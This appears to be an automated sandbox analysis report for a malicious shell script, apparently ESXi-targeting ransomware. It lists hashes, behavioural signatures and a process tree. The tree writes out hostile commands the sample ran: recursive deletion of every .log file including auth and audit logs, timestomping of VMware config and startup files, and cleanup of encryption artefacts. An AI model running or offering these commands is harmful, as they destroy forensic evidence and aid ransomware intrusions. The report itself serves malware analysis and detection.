Analysis
-
max time kernel
3s -
max time network
1678s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
25-02-2024 14:29
General
-
Target
script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh
-
Size
3KB
-
MD5
cf5762eea336cf74a0323d715f72b8b9
-
SHA1
b40e39adadc5ae4d98fd3900837414797562b1bc
-
SHA256
ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28
-
SHA512
35822aafe30d8a14a1ac48d25f6a5eff90c55e18c44df6432bcec962370b6ff1fe06559510090691abb5e4b50594b7067b48f3e582944b07af1c3669fe739c77
Score
7/10
Malware Config
Signatures
-
Deletes Audit logs 1 TTPs 1 IoCs
Deletes logs related to the Linux Audit framework.
-
Deletes log files 1 TTPs 11 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 17 IoCs
-
Reads hardware information 1 TTPs 1 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Reads network interface configuration 2 TTPs 12 IoCs
Fetches information about one or more active network interfaces.
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh/tmp/script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh1⤵
-
/usr/bin/chmodchmod +x /tmp//encrypt2⤵
-
-
/usr/bin/findfind /usr/lib/vmware -type f -name index.html2⤵
-
-
/usr/bin/mvmv /etc/motd /etc/motd12⤵
-
-
/bin/find/bin/find / -name "*.log" -exec /bin/rm -rf "{}" ";"2⤵
- Reads CPU attributes
- Reads hardware information
- Reads network interface configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
/bin/rm/bin/rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-e9de34b2.log3⤵
-
-
/bin/rm/bin/rm -rf /var/log/auth.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/kern.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/fontconfig.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/gpu-manager.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/audit/audit.log3⤵
- Deletes Audit logs
-
-
/bin/rm/bin/rm -rf /var/log/dpkg.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/ubuntu-advantage.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/apt/history.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/apt/term.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/alternatives.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /var/log/Xorg.0.log3⤵
- Deletes log files
-
-
/bin/rm/bin/rm -rf /root/.local/share/gvfs-metadata/root-df984320.log3⤵
-
-
/bin/rm/bin/rm -rf /root/.local/share/gvfs-metadata/trash:-da0a1fea.log3⤵
-
-
/bin/rm/bin/rm -rf /root/.local/share/gvfs-metadata/home-7c5e10cb.log3⤵
-
-
/bin/rm/bin/rm -rf /run/initramfs/fsck.log3⤵
-
-
-
/bin/rm/bin/rm -f /store/packages/vmtools.py2⤵
-
-
/bin/touch/bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/endpoints.conf2⤵
-
-
/bin/touch/bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh2⤵
-
-
/bin/touch/bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/rc.local.d/local.sh2⤵
-
-
/bin/rm/bin/rm -f /tmp/encrypt /tmp/nohup.out /tmp/index.html /tmp/motd /tmp/public.pem /tmp/archieve.zip2⤵
-
-
/bin/sh/bin/sh /bin/auto-backup.sh2⤵
-
-
/bin/rm/bin/rm -- /tmp/script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh2⤵
-
-
/etc/init.d/SSH/etc/init.d/SSH start2⤵
-
-
/usr/bin/awkawk "{print \$3}"1⤵
-
/usr/bin/grepgrep "Config File"1⤵
-
/usr/bin/awkawk "{print \$2}"1⤵
-
/usr/bin/grepgrep vmx1⤵
-
/usr/bin/psps1⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "-F " "{print \$2}"1⤵
-
/usr/bin/grepgrep /vmfs/volumes/1⤵
-
/bin/wc/bin/wc -l1⤵
-
/bin/grep/bin/grep -v grep1⤵
-
/bin/grep/bin/grep encrypt1⤵
-
/bin/ps/bin/ps1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/wc/bin/wc -l1⤵
-
/bin/grep/bin/grep " 7."1⤵
-
/bin/vmware/bin/vmware -l1⤵